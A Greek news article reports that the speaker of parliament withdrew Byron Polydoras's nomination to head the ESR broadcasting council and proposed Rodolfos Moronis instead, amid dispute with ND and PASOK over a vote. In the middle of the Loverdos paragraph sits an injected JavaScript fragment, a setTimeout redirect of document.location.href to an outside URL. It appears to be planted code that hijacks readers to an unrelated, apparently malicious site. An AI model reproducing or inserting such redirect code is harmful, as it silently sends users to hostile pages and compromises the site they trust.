Πολύδωρας τέλος -Απέσυρε την πρόταση ο πρόεδρος της Βουλής

0
8

Απέσυρε την πρόταση για ανάληψη της προεδρίας του ΕΣΡ από τον Βύρωνα Πολύδωρα, μετά την καθολική αντίδραση της αντιπολίτευσης, ο πρόεδρος της Βουλής και αντιπρόεινε τον Ροδόλφο Μορώνη ζητώντας μάλιστα να γίνει ψηφοφορία στη διάσκεψη των προέδρων της Βουλής.

Ο εκπρόσωπος της ΝΔ Νίκος Δένδιας εξέφρασε την αντίθεσή του, υποστηρίζοντας ότι δεν έχει κανένα νόημα να γίνει τώρα ψηφοφορία. Θα έπρεπε -όπως είπε- να τροποποιηθεί η νέα ρύθμιση του Νίκου Παππά, με την οποία αναστέλεται η μεταφορά των αρμοδιοτήτων του ΕΣΡ στον υπουργό Επικρατείας για τη διενέργεια δαγωνισμού. Και να αντικατασταθεί η λέξη «αναστολή» με τη λέξη «κατάργηση». Τυχόν επιμονή στη διεξαγωγή ψηφοφορίας θα δημιουργούσε την εντύπωση ότι επιθυμείτε την εξαγωγή αρνητικού συμπεράσματος. πρόσθεσε.

Ο Νίκος Βούτσης επέμεινε ότι η λέξη «αναστολή» υπάρχει στο κείμενο μόνο και μόνο για να μη μπορούν να εγείρουν αξιώσεις οι υπερθεματιστές του ακυρωθέντος διαγωνισμού εναντίον του δημοσίου και δήλωσε ότι η ψηφοφορία θα γίνει και η ΝΔ μπορεί να ψηφίσει όχι στο πρόσωπο του Ροδόλφου Μορώνη ως προσώπου, του πρώην προέδρου της Αυγής Βασίλη Μουλόπουλου ως αντιπρόεδρου και του Νίκου Κιάου ως νέου μέλους.

Στο σημείο αυτό παρενέβη ο Ανδρέας Λοβέρδος ως εκπρόσωπος του ΠΑΣΟΚ και τόνισε ότι μπορεί να γίνει ψηφοφορία, υπό την προυπόθεση ότι μετά από 15λεπτη διακοπή μπορεί να θέσει ορισμένα ερωτήματα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here